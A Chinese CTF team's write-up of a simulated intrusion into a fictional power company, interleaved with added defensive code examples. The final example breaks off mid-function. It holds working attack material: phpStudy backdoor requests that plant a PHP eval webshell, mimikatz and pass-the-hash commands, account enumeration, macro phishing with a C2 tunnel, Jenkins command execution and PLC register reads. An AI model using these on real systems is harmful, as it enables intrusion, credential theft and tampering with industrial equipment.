Recruitment
N0wayBack
-Recruitment notes-
Requirements
· At least 1 year of CTF experience
· Passionate about cybersecurity and fond of CTF
· No difficulty communicating with others, no taste for passive-aggressive sarcasm; willing to contribute and share, eager to improve yourself while helping others
· Time to take part in all kinds of competitions; follow the team's management and arrangements
· Winners of various competitions and people of outstanding ability are considered case by case
· Not a member of another university alliance team
· First-year students: experience requirement relaxed case by case
Contact
Send your résumé to the mailbox
· Résumé mailbox: [email protected]
This writeup was completed together with xrntkk; thanks to l1n3 for the help.
chu0✌️'s note:
Welcome to join nk
flag1
❝
Level story: Agent V, hello. We have received a tip that X City Yidian Control Systems Co., Ltd. (易电控制系统有限责任公司) may have an improper business relationship involving cryptocurrency mining. You are now tasked with assisting the investigation and evidence collection against this company to complete this special operation. The operation codename is "Electric Eel". Following the organization's standard procedure, first decrypt the data. The data is encrypted with fourth-generation Rivest technology, and its contents are as follows:
U2FsdGVkX19Inyq1HPE5sERtI1rHJkxrAnfKGVZYLwN82iSftU2hqTS16EcOZg2wRxZcSeOH8RgSqlQFOt8SdA==
The RC4 key is the target's English name
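The base64 above begins with "U2FsdGVkX1", which is the "Salted__" magic of `openssl enc -salt`: eight bytes of salt follow, and the RC4 key is derived from the passphrase and salt with OpenSSL's legacy EVP_BytesToKey (a single MD5, no iteration, which is why guessing a short passphrase like a company name is cheap). The decoder below is an added example, not code from the writeup; the candidate passphrase "ePower" in the `__main__` block is an assumption taken from the target's web title, and the block does not assume that it is the right one.

```python
import base64
import hashlib
import os


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA); encryption and decryption are the same operation."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def evp_bytes_to_key(password: bytes, salt: bytes, key_len: int = 16) -> bytes:
    """OpenSSL's legacy EVP_BytesToKey: MD5, one iteration, no stretching.
    This is what `openssl enc -rc4` uses when -pbkdf2 is not given (RC4 = 16-byte key)."""
    derived = b""
    block = b""
    while len(derived) < key_len:
        block = hashlib.md5(block + password + salt).digest()
        derived += block
    return derived[:key_len]


def split_salted_blob(b64_blob: str):
    """Return (salt, ciphertext) from an `openssl enc -salt` style base64 blob."""
    raw = base64.b64decode(b64_blob)
    if len(raw) < 16 or not raw.startswith(b"Salted__"):
        raise ValueError("not an OpenSSL 'Salted__' blob")
    return raw[8:16], raw[16:]


def openssl_rc4_decrypt(b64_blob: str, password: str) -> bytes:
    salt, body = split_salted_blob(b64_blob)
    return rc4(evp_bytes_to_key(password.encode(), salt), body)


def openssl_rc4_encrypt(plaintext: bytes, password: str, salt=None) -> str:
    """Inverse operation, useful to round-trip test the decoder against known data."""
    salt = os.urandom(8) if salt is None else salt
    body = rc4(evp_bytes_to_key(password.encode(), salt), plaintext)
    return base64.b64encode(b"Salted__" + salt + body).decode()


# Ciphertext quoted in the level story above; the key is the target's English name.
LEVEL_BLOB = "U2FsdGVkX19Inyq1HPE5sERtI1rHJkxrAnfKGVZYLwN82iSftU2hqTS16EcOZg2wRxZcSeOH8RgSqlQFOt8SdA=="

if __name__ == "__main__":
    candidate = "ePower"  # assumption: the English name shown in the target's web title
    print(openssl_rc4_decrypt(LEVEL_BLOB, candidate))
```

Because RC4 is a stream cipher, a wrong passphrase never raises an error, it just yields noise; check that the output is printable before trusting it.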
Information gathering
39.98.117.59:22 open
39.98.117.59:80 open
[*] alive ports len is: 2
start vulscan
[*] WebTitle http://39.98.117.59 code:302 len:0 title:None 跳转url: http://39.98.117.59/sys/index.php
[*] WebTitle http://39.98.117.59/sys/index.php code:200 len:131 title:None
39.99.233.71:22 open
39.99.233.71:8080 open
39.99.233.71:80 open
[*] alive ports len is: 3
start vulscan
[*] WebTitle http://39.99.233.71 code:200 len:20069 title:易电科技 - 易电科技
[*] WebTitle http://39.99.233.71:8080 code:200 len:2299 title:ePower
flag2
❝
Level story: Obtain Yidian's contact directory and find the flag in it.
Start with the second site
Usernames can be enumerated here: if the username exists, the server reports the account as locked after several wrong passwords; if it does not exist, it keeps reporting a wrong password. Write a script to find which users exist; the wordlist is not provided here.
import requests

URL = "http://39.99.133.183:80/sys/index.php?m=user&f=login"
COOKIES = {"rid": "90krpqj2986s2qss8fuolgoogg", "lang": "zh-cn", "theme": "default"}
HEADERS = {"X-Requested-With": "XMLHttpRequest", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36", "Accept": "application/json, text/javascript, */*; q=0.01", "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://39.99.133.183", "Referer": "http://39.99.133.183/sys/index.php?m=user&f=login", "Accept-Encoding": "gzip, deflate, br", "Accept-Language": "zh-CN,zh;q=0.9", "Connection": "close"}

with open('ComPanyName.txt', 'r') as names:
    for name in names:
        name = name.strip()
        data = {"account": name, "password": "23079896abb4553b11ad2d3e557485a8", "referer": "http://39.99.133.183/sys/index.php?m=user&f=login", "rawPassword": "202cb962ac59075b964b07152d234b70", "keepLogin": "false"}
        for _ in range(6):  # a few wrong attempts: only existing accounts get locked
            try:
                r = requests.post(URL, headers=HEADERS, cookies=COOKIES, data=data)
            except requests.RequestException:
                print(f"nonono:{name}")
                break
            if '\u9501\u5b9a' in r.text:  # "锁定" (locked) is only returned for accounts that exist
                print(name)
                break
This yields a few users; then try weak passwords against them, and in the end the following account logs in successfully:
zhangwei/123456
The second flag is under Team - Colleagues
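From the defender's side, the lockout message above is an account-existence oracle, and the enumeration it enables leaves a distinctive trace: one source failing logins against many different accounts in a short window. The detector below is an added example, not part of the writeup; the log format and the sample lines are constructed for the example, so the field names and the 5-accounts-in-5-minutes threshold are assumptions to adapt to a real application log.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed application auth log (one event per line); not output from the page's target.
SAMPLE_LOG = """\
2024-06-01T10:00:01 src=203.0.113.5 account=alice result=fail reason=no_such_user
2024-06-01T10:00:02 src=203.0.113.5 account=bob result=fail reason=no_such_user
2024-06-01T10:00:03 src=203.0.113.5 account=carol result=fail reason=bad_password
2024-06-01T10:00:04 src=203.0.113.5 account=carol result=fail reason=bad_password
2024-06-01T10:00:05 src=203.0.113.5 account=carol result=fail reason=locked
2024-06-01T10:00:06 src=203.0.113.5 account=dave result=fail reason=no_such_user
2024-06-01T10:00:07 src=203.0.113.5 account=erin result=fail reason=no_such_user
2024-06-01T10:00:08 src=203.0.113.5 account=frank result=fail reason=no_such_user
2024-06-01T10:30:00 src=198.51.100.7 account=grace result=fail reason=bad_password
2024-06-01T10:30:09 src=198.51.100.7 account=grace result=ok reason=-
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) src=(?P<src>\S+) account=(?P<account>\S+) "
    r"result=(?P<result>\S+) reason=(?P<reason>\S+)$"
)


def parse_log(text: str):
    """Turn log lines into dicts; malformed lines are skipped rather than crashing the job."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            e = m.groupdict()
            e["ts"] = datetime.fromisoformat(e["ts"])
            events.append(e)
    return events


def find_enumeration(events, window=timedelta(minutes=5), min_accounts=5):
    """Return {src: max distinct accounts} for sources whose failed logins touch at least
    min_accounts different accounts inside one sliding time window."""
    by_src = defaultdict(list)
    for e in events:
        if e["result"] != "ok":
            by_src[e["src"]].append(e)
    alerts = {}
    for src, evs in by_src.items():
        evs.sort(key=lambda e: e["ts"])
        lo = 0
        for hi in range(len(evs)):
            while evs[hi]["ts"] - evs[lo]["ts"] > window:   # slide the window start forward
                lo += 1
            distinct = len({e["account"] for e in evs[lo:hi + 1]})
            if distinct >= min_accounts:
                alerts[src] = max(alerts.get(src, 0), distinct)
    return alerts


def run_sample():
    return find_enumeration(parse_log(SAMPLE_LOG))


if __name__ == "__main__":
    print(run_sample())
```

Counting distinct accounts per source, rather than raw failures, separates enumeration from a single user mistyping a password. The matching fix on the application side is to return one generic message ("invalid account or password") for wrong password, unknown account and locked account alike, and keep the real reason in the server log only.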
flag3
❝
Level story: Log in to Yidian's VPN, then visit http://172.28.20.2:88/ to get the flag.
Visit the second site; port 8080 offers the VPN file for download. However, the certificate inside the VPN profile has expired, so to use it we need to set the local clock to a time within the certificate's validity period, otherwise the VPN cannot connect.
Click to download the config file and change the local time; any time between 2023-01-04 12:35:43 and 2025-04-08 12:35:43 works. As for where those dates come from, you can hand the file to an AI to analyze.
date -s "2024-01-01 00:00:00"
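The two dates are simply the notBefore and notAfter fields of the certificate embedded in the profile's `<cert>` block; `openssl x509 -noout -dates` on that block prints them. The parser below is an added example (not from the writeup) that extracts the block and walks the DER structure down to the Validity sequence, so the check can be scripted. The profile it runs on is a constructed, unsigned certificate skeleton carrying the writeup's dates, a stand-in for the real ePower.ovpn, which is not reproduced here.

```python
import base64
import re
from datetime import datetime, timezone


def der_cert_from_ovpn(ovpn_text: str) -> bytes:
    """Pull the inline <cert> block out of an OpenVPN profile and return its DER bytes."""
    m = re.search(r"<cert>(.*?)</cert>", ovpn_text, re.S)
    if not m:
        raise ValueError("no inline <cert> block in profile")
    b64 = "".join(s for s in (line.strip() for line in m.group(1).splitlines())
                  if s and not s.startswith("-----"))
    return base64.b64decode(b64)


def _tlv(buf: bytes, pos: int):
    """Decode one DER tag/length header; return (tag, value_start, value_end)."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:                      # long form: next n bytes hold the length
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    return tag, pos, pos + length


def _children(buf: bytes, start: int, end: int):
    pos = start
    while pos < end:
        tag, vstart, vend = _tlv(buf, pos)
        yield tag, vstart, vend
        pos = vend


def _asn1_time(buf: bytes, tag: int, start: int, end: int) -> datetime:
    text = buf[start:end].decode("ascii")
    if tag == 0x17:                        # UTCTime YYMMDDHHMMSSZ; RFC 5280: 00-49 means 20xx
        text = ("20" if int(text[:2]) < 50 else "19") + text
    elif tag != 0x18:                      # 0x18 is GeneralizedTime YYYYMMDDHHMMSSZ
        raise ValueError("unexpected time tag %#x" % tag)
    return datetime.strptime(text, "%Y%m%d%H%M%SZ").replace(tzinfo=timezone.utc)


def cert_validity(der: bytes):
    """(notBefore, notAfter) of an X.509 DER certificate, read from the TBS structure."""
    _, outer_start, _ = _tlv(der, 0)                       # Certificate ::= SEQUENCE
    _, tbs_start, tbs_end = _tlv(der, outer_start)          # tbsCertificate ::= SEQUENCE
    fields = list(_children(der, tbs_start, tbs_end))
    if fields[0][0] == 0xA0:                                 # optional [0] EXPLICIT version
        fields = fields[1:]
    _, vstart, vend = fields[3]                              # serial, sigAlg, issuer, validity
    (t1, s1, e1), (t2, s2, e2) = list(_children(der, vstart, vend))
    return _asn1_time(der, t1, s1, e1), _asn1_time(der, t2, s2, e2)


def validity_window(ovpn_text: str):
    """(notBefore, notAfter) as strings in the same format `date -s` takes."""
    nb, na = cert_validity(der_cert_from_ovpn(ovpn_text))
    fmt = "%Y-%m-%d %H:%M:%S"
    return nb.strftime(fmt), na.strftime(fmt)


def clock_is_inside_validity(ovpn_text: str, local_time: str) -> bool:
    """Would a clock set to local_time ('YYYY-MM-DD HH:MM:SS', treated as UTC) pass the check?"""
    nb, na = cert_validity(der_cert_from_ovpn(ovpn_text))
    when = datetime.strptime(local_time, "%Y-%m-%d %H:%M:%S").replace(tzinfo=timezone.utc)
    return nb <= when <= na


# --- constructed sample profile (stand-in for ePower.ovpn, not the real file) ----------
def _enc(tag: int, payload: bytes) -> bytes:
    n = len(payload)
    if n < 0x80:
        return bytes([tag, n]) + payload
    lb = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(lb)]) + lb + payload


def _skeleton_cert_pem(not_before: str, not_after: str) -> str:
    """Unsigned skeleton with only the fields the parser walks; not a usable certificate."""
    validity = _enc(0x30, _enc(0x17, not_before.encode()) + _enc(0x17, not_after.encode()))
    tbs = _enc(0x30, _enc(0xA0, _enc(0x02, b"\x02")) + _enc(0x02, b"\x01") + _enc(0x30, b"")
               + _enc(0x30, b"") + validity + _enc(0x30, b"") + _enc(0x30, b""))
    cert = _enc(0x30, tbs + _enc(0x30, b"") + _enc(0x03, b"\x00"))
    return "-----BEGIN CERTIFICATE-----\n%s\n-----END CERTIFICATE-----" % base64.b64encode(cert).decode()


SAMPLE_OVPN = "client\nremote vpn.example.invalid 1194\n<cert>\n%s\n</cert>\n" % _skeleton_cert_pem(
    "230104123543Z", "250408123543Z")   # the validity window the writeup gives

if __name__ == "__main__":
    print(validity_window(SAMPLE_OVPN), clock_is_inside_validity(SAMPLE_OVPN, "2024-01-01 00:00:00"))
```

A client certificate that has to be "fixed" by winding the clock back is a finding in itself: the server still accepts a credential that should have been retired, and an expired VPN profile circulating on an internet-facing download page is the kind of leftover an asset inventory should catch.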
Connect to the VPN
openvpn ePower.ovpn
Enter zhangwei/123456 as the credentials
Visit the site to get the flag
http://172.28.20.2:88/
Internal network scan
10.x
172.28.10.10:22 open
172.28.10.10:80 open
172.28.10.20:22 open
172.28.10.20:80 open
172.28.10.10:8080 open
[*] alive ports len is: 5
start vulscan
[*] WebTitle: http://172.28.10.20 code:302 len:0 title:None 跳转url: http://172.28.10.20/sys/index.php
[*] WebTitle: http://172.28.10.10 code:200 len:20069 title:易电科技 - 易电科技
[*] WebTitle: http://172.28.10.10:8080 code:200 len:2299 title:ePower
[*] WebTitle: http://172.28.10.20/sys/index.php code:200 len:131 title:None
20.x
172.28.20.101:22 open
172.28.20.102:22 open
172.28.20.2:25 open
172.28.20.1:53 open
172.28.20.1:139 open
172.28.20.2:139 open
172.28.20.1:135 open
172.28.20.2:135 open
172.28.20.101:222 open
172.28.20.2:389 open
172.28.20.1:389 open
172.28.20.1:445 open
172.28.20.2:445 open
172.28.20.1:464 open
172.28.20.2:465 open
172.28.20.101:80 open
172.28.20.2:110 open
172.28.20.2:88 open
172.28.20.2:143 open
172.28.20.2:80 open
172.28.20.1:88 open
172.28.20.1:593 open
172.28.20.1:636 open
172.28.20.2:993 open
172.28.20.2:995 open
172.28.20.1:3268 open
172.28.20.1:3269 open
172.28.20.2:3389 open
172.28.20.1:3389 open
172.28.20.2:6000 open
172.28.20.2:6020 open
172.28.20.2:6021 open
172.28.20.2:6443 open
172.28.20.2:6989 open
172.28.20.2:6990 open
172.28.20.102:8080 open
172.28.20.1:9389 open
172.28.20.2:47001 open
172.28.20.1:47001 open
172.28.20.2:49664 open
172.28.20.1:49664 open
172.28.20.2:49665 open
172.28.20.1:49665 open
172.28.20.2:49666 open
172.28.20.1:49666 open
172.28.20.2:49667 open
172.28.20.1:49667 open
172.28.20.2:49668 open
172.28.20.1:49668 open
172.28.20.2:49669 open
172.28.20.1:49669 open
172.28.20.2:49670 open
172.28.20.1:49673 open
172.28.20.2:49674 open
172.28.20.1:49676 open
172.28.20.1:49677 open
172.28.20.1:49680 open
172.28.20.1:49689 open
172.28.20.1:49716 open
172.28.20.1:62290 open
[*] alive ports len is: 60
start vulscan
[*] NetInfo:
[*]172.28.20.1 [->]DC [->]172.28.20.1
[*] WebTitle: http://172.28.20.101 code:200 len:13646 title:ePower Git
[*] NetInfo:
[*]172.28.20.2 [->]MAIL [->]172.28.20.2
[*] NetBios: 172.28.20.1 [+]DC EPOWERDC
[*] NetBios: 172.28.20.2 EPOWERMAIL
[*] WebTitle: http://172.28.20.1:47001 code:404 len:315 title:Not Found
[*] WebTitle: http://172.28.20.2:6443 code:400 len:287 title:400 Bad Request
[*] WebTitle: http://172.28.20.2:47001 code:404 len:315 title:Not Found
[*] WebTitle: http://172.28.20.2:88 code:200 len:781 title:IIS Windows Server
[*] WebTitle: http://172.28.20.2 code:200 len:9863 title:WebMail | Powered by Winmail Server - 登录
[+] InfoScan:http://172.28.20.101 [Gitea简易Git服务]
[*] WebTitle: http://172.28.20.102:8080 code:403 len:541 title:None
30.x
172.28.30.10:80 open
172.28.30.10:135 open
172.28.30.30:139 open
172.28.30.20:135 open
172.28.30.20:139 open
172.28.30.10:139 open
172.28.30.40:139 open
172.28.30.40:135 open
172.28.30.30:135 open
172.28.30.30:445 open
172.28.30.40:445 open
172.28.30.20:445 open
172.28.30.10:445 open
172.28.30.10:3306 open
172.28.30.40:3389 open
172.28.30.20:3389 open
172.28.30.30:3389 open
172.28.30.10:3389 open
172.28.30.20:47001 open
172.28.30.40:47001 open
172.28.30.10:47001 open
172.28.30.30:47001 open
172.28.30.10:49664 open
172.28.30.20:49664 open
172.28.30.30:49664 open
172.28.30.40:49664 open
172.28.30.30:49665 open
172.28.30.20:49665 open
172.28.30.40:49665 open
172.28.30.10:49667 open
172.28.30.10:49666 open
172.28.30.20:49667 open
172.28.30.20:49668 open
172.28.30.10:49668 open
172.28.30.40:49667 open
172.28.30.40:49666 open
172.28.30.30:49666 open
172.28.30.20:49666 open
172.28.30.10:49665 open
172.28.30.40:49668 open
172.28.30.20:49669 open
172.28.30.30:49668 open
172.28.30.10:49669 open
172.28.30.40:49669 open
172.28.30.30:49670 open
172.28.30.30:49672 open
172.28.30.10:49671 open
172.28.30.40:49670 open
172.28.30.20:49670 open
172.28.30.20:49677 open
172.28.30.10:49676 open
172.28.30.30:49676 open
172.28.30.10:49674 open
172.28.30.40:49677 open
172.28.30.30:49669 open
172.28.30.30:49679 open
172.28.30.20:49683 open
172.28.30.40:49683 open
[*] alive ports len is: 58
start vulscan
[*] NetInfo:
[*]172.28.30.10 [->]EP-1117 [->]172.28.30.10
[*] WebTitle: http://172.28.30.10 code:200 len:29 title:None
[*] NetInfo:
[*]172.28.30.40 [->]EP-1131 [->]172.28.30.40
[*] NetInfo:
[*]172.28.30.20 [->]EP-1122 [->]172.28.30.20
[*] WebTitle: http://172.28.30.20:47001 code:404 len:315 title:Not Found
[*] NetBios: 172.28.30.30 EPOWEREP-1132
[*] NetBios: 172.28.30.10 EPOWEREP-1117
[*] NetBios: 172.28.30.40 EPOWEREP-1131
[*] WebTitle: http://172.28.30.30:47001 code:404 len:315 title:Not Found
[*] NetBios: 172.28.30.20 EPOWEREP-1122
[*] WebTitle: http://172.28.30.10:47001 code:404 len:315 title:Not Found
[*] WebTitle: http://172.28.30.40:47001 code:404 len:315 title:Not Found
[+] http://172.28.30.10 poc-yaml-phpstudy-backdoor-rce
flag4
❝
Level story: Obtain Yidian's internal asset list and get the flag.
First hit the phpStudy RCE
GET / HTTP/1.1
Host: 172.28.30.10
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip,deflate
Accept-Charset: c3lzdGVtKCJkaXIiKTs=
Accept-Language: zh-CN,zh;q=0.9
Connection: close
dir to find the directory location
Write a shell
GET / HTTP/1.1
Host: 172.28.30.10
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip,deflate
Accept-Charset: ZnB1dHMoZm9wZW4oJ0M6XFVzZXJzXHdhbmdnYW5nXERlc2t0b3BccGhwU3R1ZHlcUEhQVHV0b3JpYWxcV1dXXHNoZWxsLnBocCcsJ3cnKSwnPD9waHAgQGV2YWwoJF9QT1NUWzFdKTsgPz4nKTs=
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Grab the asset list from the wanggang directory
The flag is inside it
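The two requests above carry their PHP payload base64-encoded in the Accept-Charset header, which is the tell-tale of the phpStudy backdoor (the backdoored php_xmlrpc.dll reads base64 from Accept-Charset or Accept-Encoding and evaluates it). A web-log or proxy check for that pattern is cheap, since a legitimate Accept-Charset value ("utf-8", "iso-8859-1;q=0.5") is never valid base64 that decodes to PHP. The inspector below is an added example, not from the writeup; the benign request is constructed, and the suspicious one is a trimmed copy of the first request above.

```python
import base64
import binascii
import re

# Headers the phpStudy backdoor reads its base64 payload from
PAYLOAD_HEADERS = ("accept-charset", "accept-encoding")
# Tokens that no legitimate value of those headers decodes to
PHP_MARKERS = re.compile(
    rb"(?:system|eval|exec|passthru|shell_exec|fopen|fputs|assert)\s*\(|<\?php|\$_(?:POST|GET|REQUEST)"
)


def parse_request_headers(raw: str) -> dict:
    """Split a raw HTTP/1.1 request into {lowercased header name: value}."""
    lines = raw.replace("\r\n", "\n").split("\n")
    headers = {}
    for line in lines[1:]:          # skip the request line, stop at the blank line
        if not line.strip():
            break
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return headers


def inspect_request(raw: str):
    """Return [(header, decoded_text)] for headers carrying base64-wrapped PHP code."""
    findings = []
    for name, value in parse_request_headers(raw).items():
        if name not in PAYLOAD_HEADERS or not value:
            continue
        try:
            decoded = base64.b64decode(value, validate=True)
        except (binascii.Error, ValueError):
            continue                # ordinary values such as "utf-8" or "gzip, deflate" are not base64
        if PHP_MARKERS.search(decoded):
            findings.append((name, decoded.decode("latin-1")))
    return findings


# Trimmed copy of the first request in this section (the "dir" one).
PAGE_REQUEST = (
    "GET / HTTP/1.1\r\n"
    "Host: 172.28.30.10\r\n"
    "Accept-Encoding: gzip,deflate\r\n"
    "Accept-Charset: c3lzdGVtKCJkaXIiKTs=\r\n"
    "Connection: close\r\n\r\n"
)
# Constructed ordinary browser request for comparison.
BENIGN_REQUEST = (
    "GET / HTTP/1.1\r\n"
    "Host: 172.28.30.10\r\n"
    "Accept-Encoding: gzip, deflate, br\r\n"
    "Accept-Charset: utf-8, iso-8859-1;q=0.5\r\n"
    "Connection: close\r\n\r\n"
)

if __name__ == "__main__":
    print(inspect_request(PAGE_REQUEST), inspect_request(BENIGN_REQUEST))
```

Alerting on the decoded content rather than on "base64 in a header" keeps false positives down; the real fix is replacing the trojaned php_xmlrpc.dll with a clean build and verifying the installer's hash, since the backdoor executes before any application code runs.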
flag5
❝
Level story: Obtain access to a personal machine in the development department and get the flag.
Add a user and RDP in
Dump credentials
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords full" exit
Crack it with cmd5; cmd5 isn't strictly needed, the hash can be used directly for RDP
WG19891006..
We RDP to the machine as Wang Gang's user; opening Foxmail logs in directly. Later we need to send phishing emails, so first set up CS. I set up CS on the machine running the VPN, IP 192.168.255.6, but the target machines cannot reach that machine, so we need port forwarding: map the CS listener port onto wanggang's machine so that beacons can check in. frp is used for the forwarding; set that up first.
frpc.ini
[common]
server_addr = 172.28.30.10
server_port = 7000

[plugin_socks6]
type = tcp
remote_port = 60051
local_port = 60051
local_ip = 127.0.0.1
frps.ini
[common]
bind_port = 7000

[tcp_1200]
type = tcp
local_ip = 127.0.0.1
local_port = 60051
remote_port = 60051
CS listener configuration
Generate the macro code
Insert the macro code
Paste in the copied macro code
Send the email to the development department staff
Wait a moment and the beacon checks in
Add a user and RDP
The flag is in the root of C:
flag6
❝
Level story: Obtain the source code of Yidian's portal website and get the flag.
Upload mimikatz to dump lixiaoliang's hash
This time it didn't crack, so just use the hash for RDP
proxychains4 xfreerdp /u:lixiaoliang /d:epower.com /pth:7757a4190de1cf575d69b56d0a3eeac9 /v:172.28.30.20
The browser history actually has quite a lot of material
Visit Gitea
http://git.epower.com/lixiaoliang/www
The username and password autofill; the sixth flag can be found here
flag7
❝
Level story: Break into Yidian's portal website and get the flag.
Password autofill gives a lot of information, including the test instance of the portal; use a tool to dump the browser's saved passwords
admin/Adm!n586
lixiaoliang/LiXL19871011...
Continuing through the source code we can find the admin backend address, so we can try logging into the backend
Login successful
admin/Adm!n586
Arbitrary file download yields the flag; it can also be used to get a shell
GET /admin_fe4c.php?m=ui&f=downloadtheme&theme=L2ZsYWc= HTTP/1.1
Host: 39.99.138.0
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://39.99.138.0
Referer: http://39.99.138.0/admin_fe4c.php?m=ui&f=settemplate
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: frontsid=r2nj6gtgga53gp9ot08r0sig8l; frontLang=zh-cn; device=desktop; theme=default; adminsid=iful5n2db75aqjq6g4nosa60nn; adminLang=zh-cn; visualDevice=desktop; currentGroup=design
Connection: close
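The `theme=L2ZsYWc=` parameter is base64 for `/flag`: the download handler decodes the value and uses it as a path, and an absolute path joined onto the theme directory simply replaces it. The portal is a PHP application, but the check that closes this hole is language-independent, so the added example below (not the portal's code; the theme root path is an assumption) shows the weak resolution beside a hardened one in Python.

```python
import base64
import binascii
import posixpath
import re

THEME_ROOT = "/var/www/html/system/template"   # assumption: where the app keeps its themes


def encode_theme(name: str) -> str:
    """Encode a theme name the way the downloadtheme parameter carries it (base64)."""
    return base64.b64encode(name.encode()).decode()


def vulnerable_resolve(theme_b64: str, root: str = THEME_ROOT) -> str:
    """The behaviour the request above exploits: the decoded value is joined onto the root
    with no validation, so an absolute path such as '/flag' discards the root entirely and
    '../' sequences walk out of it."""
    return posixpath.join(root, base64.b64decode(theme_b64).decode())


def hardened_resolve(theme_b64: str, root: str = THEME_ROOT) -> str:
    """Accept only a bare directory name, then confirm the resolved path stays under root."""
    try:
        name = base64.b64decode(theme_b64, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        raise ValueError("theme parameter is not base64 text")
    if not re.fullmatch(r"[A-Za-z0-9_-]{1,64}", name):      # allow-list, no separators at all
        raise ValueError("theme name rejected: %r" % name)
    path = posixpath.normpath(posixpath.join(root, name))
    if posixpath.commonpath([root, path]) != root:            # defence in depth
        raise ValueError("theme path escapes root: %r" % path)
    return path


def is_rejected(theme_b64: str) -> bool:
    """True when the hardened resolver refuses the parameter."""
    try:
        hardened_resolve(theme_b64)
        return False
    except ValueError:
        return True


if __name__ == "__main__":
    print(vulnerable_resolve("L2ZsYWc="), is_rejected("L2ZsYWc="))
```

The allow-list does the real work; the commonpath check only guards against a future relaxation of the pattern. Encoding the parameter in base64 hides nothing from an attacker and should never be mistaken for validation.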
flag8
❝
Level story: Obtain access to the CI/CD server and get the flag.
This should mean Jenkins; logging in with lixiaoliang's credentials from above directly gives a shell
http://172.28.20.102:8080/login?from=%2F
After logging in
http://172.28.20.102:8080/manage/script
Execute code directly
println "cat /flag".execute().text
flag9
❝
Level story: Obtain access to a personal machine in the finance department and get the flag.
In the mailbox on Wang Gang's machine there is a password reset record; try RDP with the reset password
RDP succeeds; the flag is in the root of C:
flag10
❝
Level story: Obtain the company's financial account information in the OA system and find the flag on that page.
Use songzhicheng's account to access zdoo; the flag is under Accounting - Team
flag11
❝
Level story: Obtain access to a personal machine in the engineering and production department and get the flag.
Same old trick: phish zhangyi with the same method, and the CS beacon checks in
It can be found in the root of C:
flag12
❝
Level story: Obtain access to the SCADA host and look for the flag on it.
As before, dump the hash and RDP in; this time the plaintext password can be dumped directly from within the domain
Open Remote Desktop; there is a saved connection entry that connects straight to the SCADA machine
After connecting, open ForceControl (力控), choose the second project, epower, then click Develop
Open it and there is the flag
flag13
❝
Level story: Get the flag from one of the PLC's registers.
Opening the Modbus scanner shows the PLC's IP is 172.30.0.10; go straight in with smod and read, read, read
proxychains4 python2 smod.py
SMOD >use modbus/function/readCoils
SMOD modbus(readCoils) >set RHOSTS 172.30.0.10
SMOD modbus(readCoils) >set Quantity 500
SMOD modbus(readCoils) >set UID 10
SMOD modbus(readCoils) >exploit
Write a script to convert it to binary
def parse_coil_status(byte_array):
    # Modbus packs coils one per bit, least-significant bit first within each byte
    coils = []
    for byte in byte_array:
        for i in range(8):
            coils.append((byte >> i) & 1)
    return coils

coils = parse_coil_status([
    102, 54, 134, 230, 222, 108, 236, 236, 166, 38, 44, 28, 140, 180, 172, 140,
    28, 76, 180, 44, 108, 108, 166, 180, 70, 44, 204, 28, 180, 70, 198, 134,
    204, 236, 156, 102, 12, 172, 134, 172, 140, 190, 0, 0, 0, 0, 0, 0, 0, 0,
])
for i in coils:
    print(i, end="")
Decode it to get the last flag
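The "decode" step is a bit-order change: the Read Coils response packs coil 0 into the least-significant bit of the first byte, while the ASCII hidden in the coils reads naturally with the first coil as the most-significant bit, so regrouping the coil stream eight at a time MSB-first (equivalently, reversing the bits of every byte) turns the data above into text. The decoder below is an added example, not the writeup's script; it runs on the response bytes quoted above and strips the all-zero padding produced by reading more coils than were written.

```python
# Response bytes from the smod readCoils run above (PLC 172.30.0.10, UID 10).
COIL_BYTES = [102, 54, 134, 230, 222, 108, 236, 236, 166, 38, 44, 28, 140, 180, 172, 140,
              28, 76, 180, 44, 108, 108, 166, 180, 70, 44, 204, 28, 180, 70, 198, 134,
              204, 236, 156, 102, 12, 172, 134, 172, 140, 190, 0, 0, 0, 0, 0, 0, 0, 0]


def coils_from_response(data_bytes):
    """Unpack a Read Coils (FC 01) data field: coil k is bit k % 8 of byte k // 8,
    least-significant bit first, exactly as the Modbus application protocol packs it."""
    return [(b >> i) & 1 for b in data_bytes for i in range(8)]


def coils_to_bytes(coils):
    """Regroup the coil stream eight at a time with the first coil as the most
    significant bit (the opposite order from the wire packing). Trailing coils that
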